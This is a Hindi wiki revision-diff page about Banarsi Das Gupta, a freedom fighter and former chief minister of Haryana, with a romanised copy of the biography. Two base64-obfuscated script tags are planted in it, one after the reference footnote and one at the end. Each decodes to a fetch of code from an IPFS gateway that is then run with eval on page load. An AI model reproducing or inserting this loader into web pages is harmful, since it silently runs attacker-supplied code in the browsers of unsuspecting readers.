Difference between revisions of "बनारसी दास गुप्ता"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''बनारसीदास गुप्ता''' (अंग्रेज़ी: ''Banarsi Das Gupta'' ; जन्म- [[5 नव...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
'''बनारसीदास गुप्ता''' ([[अंग्रेज़ी]]: ''Banarsi Das Gupta'' ; जन्म- [[5 नवम्बर]], [[1917]], [[हरियाणा]]; मृत्यु- [[29 अगस्त]], [[2007]]) हरियाणा राज्य के भूतपूर्व [[मुख्यमंत्री]] थे। उन्होंने स्वतंत्रता सेनानी होते हुए सामाजिक, राजनीतिक एवं सार्वजनिक जीवन को अपने अंदाज में जिया। बनारसीदास गुप्ता [[हिन्दी भाषा]] के पक्षधर और यथार्थवादी आदर्श जननायक थे। उन्होंने राष्ट्रीय एकता एवं अखंडता को मजबूत बनाकर हरियाणा की प्रगति में अपना बहुमूल्य योगदान दिया था।<ref>{{cite web |url= http://www.bhaskar.com/article/HAR-OTH-127541-4016132.html|title= बनारसीदास गुप्ता को याद किया|accessmonthday=07 जुलाई|accessyear= 2014|last= |first= |authorlink= |format= |publisher= भास्कर.कॉम|language= हिन्दी}}</ref>
+
'''बनारसी दास गुप्ता''' ([[अंग्रेज़ी]]: ''Banarsi Das Gupta'' ; जन्म- [[5 नवम्बर]], [[1917]], [[हरियाणा]]; मृत्यु- [[29 अगस्त]], [[2007]]) हरियाणा राज्य के भूतपूर्व [[मुख्यमंत्री]] थे। उन्होंने स्वतंत्रता सेनानी होते हुए सामाजिक, राजनीतिक एवं सार्वजनिक जीवन को अपने अंदाज में जिया। बनारसी दास गुप्ता [[हिन्दी भाषा]] के पक्षधर और यथार्थवादी आदर्श जननायक थे। उन्होंने राष्ट्रीय एकता एवं अखंडता को मजबूत बनाकर हरियाणा की प्रगति में अपना बहुमूल्य योगदान दिया था।<ref>{{cite web |url= http://www.bhaskar.com/article/HAR-OTH-127541-4016132.html|title= बनारसी दास गुप्ता को याद किया|accessmonthday=07 जुलाई|accessyear= 2014|last= |first= |authorlink= |format= |publisher= भास्कर.कॉम|language= हिन्दी}}</ref>
  
*बनारसीदास गुप्ता का जन्म 5 नवम्बर, 1917 ई. में [[हरियाणा]] के [[भिवानी]] नामक स्थान पर हुआ था। उन्होंने 'बिड़ला कॉलेज', [[पिलानी]] में शिक्षा प्राप्त की थी।
+
*बनारसी दास गुप्ता का जन्म 5 नवम्बर, 1917 ई. में [[हरियाणा]] के [[भिवानी]] नामक स्थान पर हुआ था। उन्होंने 'बिड़ला कॉलेज', [[पिलानी]] में शिक्षा प्राप्त की थी।
 
*[[राष्ट्रपिता महात्मा गाँधी]] और [[पण्डित जवाहरलाल नेहरू]] के प्रभाव से वे देशी रियासतों की दमनकारी नीति का विरोध करने के लिए प्रजामंडल आंदोलन में भाग लेने लगे थे।
 
*[[राष्ट्रपिता महात्मा गाँधी]] और [[पण्डित जवाहरलाल नेहरू]] के प्रभाव से वे देशी रियासतों की दमनकारी नीति का विरोध करने के लिए प्रजामंडल आंदोलन में भाग लेने लगे थे।
*बनारसीदास गुप्ता जी की गतिविधियां देखकर [[जींद]] रियासत में उन्हें [[1941]] ई. में गिरफ्तार करके फरीदकोट जेल में बंद कर दिया था।
+
*बनारसी दास गुप्ता जी की गतिविधियां देखकर [[जींद]] रियासत में उन्हें [[1941]] ई. में गिरफ्तार करके फरीदकोट जेल में बंद कर दिया था।
*'[[भारत छोड़ो आंदोलन]]' में भी बनारसीदास गुप्ता ने भाग लिया और [[1942]] से [[1944]] ई. तक जेल में बंद रहे।
+
*'[[भारत छोड़ो आंदोलन]]' में भी बनारसी दास गुप्ता ने भाग लिया और [[1942]] से [[1944]] ई. तक जेल में बंद रहे।
*वर्ष [[1946]] में बनारसीदास जी जींद रियासत असेम्बली के और [[1968]] में [[हरियाणा]] विधान सभा के सदस्य चुने गए।
+
*वर्ष [[1946]] में बनारसी दास जी जींद रियासत असेम्बली के और [[1968]] में [[हरियाणा]] विधान सभा के सदस्य चुने गए।
 
*[[1972]] में वे [[विधान सभा]] के अध्यक्ष और [[1975]] में हरियाणा राज्य के [[मुख्यमंत्री]] बने।
 
*[[1972]] में वे [[विधान सभा]] के अध्यक्ष और [[1975]] में हरियाणा राज्य के [[मुख्यमंत्री]] बने।
*शिक्षा और पत्रकारिता के क्षेत्र में भी बनारसीदास गुप्ता का विशेष योगदान रहा था। उन्होंने कई शिक्षण संस्थाएं स्थापित कीं।
+
*शिक्षा और पत्रकारिता के क्षेत्र में भी बनारसी दास गुप्ता का विशेष योगदान रहा था। उन्होंने कई शिक्षण संस्थाएं स्थापित कीं।
*बनारसीदास गुप्ता ने 'अपना देश', 'हरियाणा केसरी' और 'हरियाणा कांग्रेस पत्रिका' के द्वारा राजनैतिक जागृति तथा समाज सुधार के क्षेत्र में योगदान किया।
+
*बनारसी दास गुप्ता ने 'अपना देश', 'हरियाणा केसरी' और 'हरियाणा कांग्रेस पत्रिका' के द्वारा राजनैतिक जागृति तथा समाज सुधार के क्षेत्र में योगदान किया।
*श्रमिकों को संगठित करके उन्हें अपने अधिकार प्राप्त कराने में भी बनारसीदास गुप्त सहायक रहे।
+
*श्रमिकों को संगठित करके उन्हें अपने अधिकार प्राप्त कराने में भी बनारसी दास गुप्त सहायक रहे।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Revision as of 11:32, 7 July 2014

banarasi das gupta (aangrezi: Banarsi Das Gupta ; janm- 5 navambar, 1917, hariyana; mrityu- 29 agast, 2007) hariyana rajy ke bhootapoorv mukhyamantri the. unhoanne svatantrata senani hote hue samajik, rajanitik evan sarvajanik jivan ko apane aandaj mean jiya. banarasi das gupta hindi bhasha ke pakshadhar aur yatharthavadi adarsh jananayak the. unhoanne rashtriy ekata evan akhandata ko majaboot banakar hariyana ki pragati mean apana bahumooly yogadan diya tha.[1]

  • banarasi das gupta ka janm 5 navambar, 1917 ee. mean hariyana ke bhivani namak sthan par hua tha. unhoanne 'bi dala k aaulej', pilani mean shiksha prapt ki thi.
  • rashtrapita mahatma gaandhi aur pandit javaharalal neharoo ke prabhav se ve deshi riyasatoan ki damanakari niti ka virodh karane ke lie prajamandal aandolan mean bhag lene lage the.
  • banarasi das gupta ji ki gatividhiyaan dekhakar jiand riyasat mean unhean 1941 ee. mean giraphtar karake pharidakot jel mean band kar diya tha.
  • 'bharat chho do aandolan' mean bhi banarasi das gupta ne bhag liya aur 1942 se 1944 ee. tak jel mean band rahe.
  • varsh 1946 mean banarasi das ji jiand riyasat asembali ke aur 1968 mean hariyana vidhan sabha ke sadasy chune ge.
  • 1972 mean ve vidhan sabha ke adhyaksh aur 1975 mean hariyana rajy ke mukhyamantri bane.
  • shiksha aur patrakarita ke kshetr mean bhi banarasi das gupta ka vishesh yogadan raha tha. unhoanne kee shikshan sansthaean sthapit kian.
  • banarasi das gupta ne 'apana desh', 'hariyana kesari' aur 'hariyana kaangres patrika' ke dvara rajanaitik jagriti tatha samaj sudhar ke kshetr mean yogadan kiya.
  • shramikoan ko sangathit karake unhean apane adhikar prapt karane mean bhi banarasi das gupt sahayak rahe.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. banarasi das gupta ko yad kiya (hindi) bhaskar.k aaum. abhigaman tithi: 07 julaee, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>